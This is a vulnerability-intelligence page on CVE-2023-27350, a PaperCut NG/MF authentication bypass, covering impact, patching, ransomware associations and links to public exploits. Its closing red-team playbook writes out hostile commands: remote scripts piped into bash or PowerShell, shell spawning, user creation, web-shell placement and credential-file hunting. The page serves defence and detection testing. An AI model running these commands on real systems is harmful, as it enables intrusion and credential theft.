CVE-2023-27350
Overview
This vulnerability is an authentication bypass caused by improper access control within the SetupCompleted class of PaperCut NG. The flaw allows unauthenticated remote users to interact with sensitive application endpoints without validation. The affected component improperly restricts access to critical service pages, enabling unauthorized operations on the system.
Vulnerability Description
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
Impact
An attacker can exploit this vulnerability without any authentication or user interaction to bypass security controls and execute arbitrary code with SYSTEM privileges on the target server. This enables full system compromise, including unauthorized access to sensitive data and potential lateral movement within the network. The exploit effectively grants complete control over the affected PaperCut NG installation, risking data breaches and operational disruption.
Solution
Apply the vendor-provided patch for PaperCut NG as detailed in their security advisory PO-1216 and PO-1219 available at https://www.papercut.com/kb/Main/PO-1216-and-PO-1219. The fix addresses the improper access control in the SetupCompleted class. Administrators should update affected installations to the patched version immediately following the vendor's instructions to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
clop
|
1254 | ransomware.live |
|
lockbit
|
5 | correlation_misp |
|
lockbit green
|
— | correlation_misp |
|
lockbit black
|
— | correlation_misp |
|
lockbit 20
|
— | correlation_misp |
|
lockbit 30
|
— | correlation_misp |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Bl00dy Ransomware Gang
|
MEDIUM | — | correlation_misp |
|
PaperCut Vulnerability Exploitation
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the PaperCut NG and PaperCut MF products stems from improper access control within the SetupCompleted class, which allows remote attackers to bypass authentication mechanisms. This flaw is particularly critical as it does not require any form of authentication to exploit, enabling unauthorized users to gain access to sensitive functionalities. The underlying issue arises from a lack of stringent checks that should verify user permissions before granting access to certain operations. As a result, an attacker can execute arbitrary code with SYSTEM-level privileges, which poses a significant threat to the integrity and confidentiality of the affected systems.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a remote request to the affected application, leveraging the flaw to gain unauthorized access. This could be done by crafting specific HTTP requests that manipulate the application's behavior, effectively bypassing the authentication process entirely. Once access is obtained, the attacker can execute arbitrary code, which could lead to further exploitation of the underlying operating system, data exfiltration, or even lateral movement within the network. The ease of exploitation, combined with the high level of access granted, makes this vulnerability particularly dangerous for organizations relying on these printing management solutions.
The real-world impact of this vulnerability is profound, especially for businesses that utilize PaperCut for print management. Given the critical nature of the access gained, attackers could potentially compromise sensitive data, disrupt business operations, or deploy malware within the network. The financial implications can be severe, including costs associated with incident response, system recovery, and potential regulatory fines if data breaches occur. Moreover, the reputational damage resulting from such an incident can lead to a loss of customer trust and a decline in market position, further amplifying the business risk.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating software to the latest versions is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, organizations should conduct routine security assessments and penetration testing to identify potential weaknesses in their systems. Employing intrusion detection systems (IDS) can also help monitor for unusual activity that may indicate exploitation attempts. Furthermore, restricting access to the application through network segmentation and implementing robust firewall rules can significantly reduce the attack surface, thereby enhancing overall security posture.
In conclusion, the vulnerability present in PaperCut NG and PaperCut MF products represents a critical threat to organizations that utilize these solutions for print management. The ability for attackers to bypass authentication and execute arbitrary code with SYSTEM privileges poses significant risks to both data integrity and business continuity. By understanding the technical details, potential exploitation scenarios, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the ramifications of this vulnerability. Proactive measures and a commitment to security best practices are essential in safeguarding sensitive information and maintaining operational resilience in the face of evolving cyber threats.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-27350, with telemetry indicating a significant uptick in attacker activity leveraging this authentication bypass vulnerability. This increase coincides with sustained interest from multiple ransomware groups, including variants of LockBit and Clop, which continue to integrate this exploit into their operational toolsets. The persistence of high-confidence ransomware associations underscores the vulnerability’s role as a critical vector for initial access and lateral movement within compromised environments. Although the EPSS score remains stable, the surge in exploitation attempts amplifies the operational risk, elevating the urgency for defenders to prioritize detection capabilities and incident response readiness. The evolving threat landscape reflects an intensification of adversary focus on PaperCut NG deployments, reinforcing the vulnerability’s criticality and its potential impact on organizational security posture.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-27350, accompanied by the emergence of several new proof-of-concept tools that simplify unauthorized access and remote code execution on vulnerable PaperCut NG instances. This expansion of the exploit toolkit lowers the technical barrier for adversaries, enabling a broader range of threat actors—including ransomware groups such as Clop and LockBit variants—to leverage this critical vulnerability for initial access and lateral movement. Our telemetry indicates that this increased exploitation activity is sustained rather than transient, signaling persistent adversary interest. While the EPSS score remains stable, the qualitative surge in attack attempts and the diversification of exploitation methods elevate the operational risk, underscoring the heightened threat level. Defenders should recognize that the evolving exploit landscape reflects a growing adversary focus on PaperCut NG environments, reinforcing the vulnerability’s criticality in current threat campaigns.
Update 3 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-27350, accompanied by the emergence of new proof-of-concept exploits and scanning tools that lower the barrier for adversaries to leverage this vulnerability. This expansion in the exploit landscape coincides with an increase in ransomware campaigns attributed to prominent groups such as Clop and multiple LockBit variants, underscoring the vulnerability’s growing appeal as a vector for initial access and lateral movement. Our telemetry indicates this heightened activity is sustained rather than sporadic, reflecting persistent adversary focus. The EPSS score has reached its maximum, reinforcing the criticality of this vulnerability in the current threat environment. Collectively, these developments elevate the operational risk for organizations running affected PaperCut NG versions, signaling an urgent need for heightened vigilance despite existing mitigations.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Papercut | Papercut Mf | All |
cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Mf | All |
cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Mf | All |
cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Ng | All |
cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Ng | All |
cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Ng | All |
cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
PaperCut PaperCutNG Authentication Bypass
exploits/multi/http/papercut_ng_auth_bypass
|
catatonicprime | Unknown | java | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| PaperCut NG/MG 22.0.4 - Authentication Bypass | MaanVader | webapps | multiple | - | View |
| PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) | MaanVader | webapps | multiple | - | View |
GitHub PoCs (14)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2023-27350
Proof of Concept Exploit for PaperCut CVE-2023-27350
|
horizon3ai | 55 | 24 | 2023-04-22 | View |
|
imancybersecurity/CVE-2023-27350-POC
|
imancybersecurity | 12 | 5 | 2023-04-21 | View |
|
adhikara13/CVE-2023-27350
Exploit for Papercut CVE-2023-27350. [+] Reverse shell [+] Mass checking
|
adhikara13 | 9 | 3 | 2023-04-25 | View |
|
MaanVader/CVE-2023-27350-POC
A simple python script to check if a service is vulnerable
|
MaanVader | 5 | 2 | 2023-04-21 | View |
|
Ap0dexMe0/CVE-2023-27350
Perfom With Massive Authentication Bypass In PaperCut MF/NG
|
Ap0dexMe0 | 2 | 2 | 2023-05-27 | View |
|
monke443/CVE-2023-27350
Unauthenticated remote command execution in Papercut service allows an attacker to execute commands due to improper acce...
|
monke443 | 4 | 0 | 2025-03-09 | View |
|
Jenderal92/CVE-2023-27350
Python 2.7
|
Jenderal92 | 0 | 4 | 2023-06-13 | View |
|
ThatNotEasy/CVE-2023-27350
Perfom With Massive Authentication Bypass In PaperCut MF/NG
|
ThatNotEasy | 2 | 2 | 2023-05-27 | View |
|
joaoaugustom/PaperCut-Authentication_Bypass_and_RCE
This exploit is based on CVE-2023-27350 and was built upon the original exploit by horizon3ai and the Metasploit module.
|
joaoaugustom | 0 | 0 | 2026-05-30 | View |
|
ASG-CASTLE/CVE-2023-27350
|
ASG-CASTLE | 0 | 0 | 2024-04-19 | View |
|
0xB0y426/CVE-2023-27350-PoC
PoC for CVE-2023-27350
|
0xB0y426 | 0 | 0 | 2025-04-14 | View |
|
Royall-Researchers/CVE-2023-27350
Papercut Vulnerability, Affected Versions are PaperCut MF or NG version 8.0 or later (excluding patched versions) on all...
|
Royall-Researchers | 0 | 0 | 2025-07-05 | View |
|
dezso-dfield/CVE-2023-27350
PaperCut NG/MG Authentication Bypass and Remote Code Execution (RCE) Exploit Tool. A standalone Bash implementation of t...
|
dezso-dfield | 0 | 0 | 2025-12-19 | View |
|
rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability
|
rasan2001 | 0 | 0 | 2024-05-10 | View |
Ransomware Groups 8
Threat Feed
33 eventsSighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.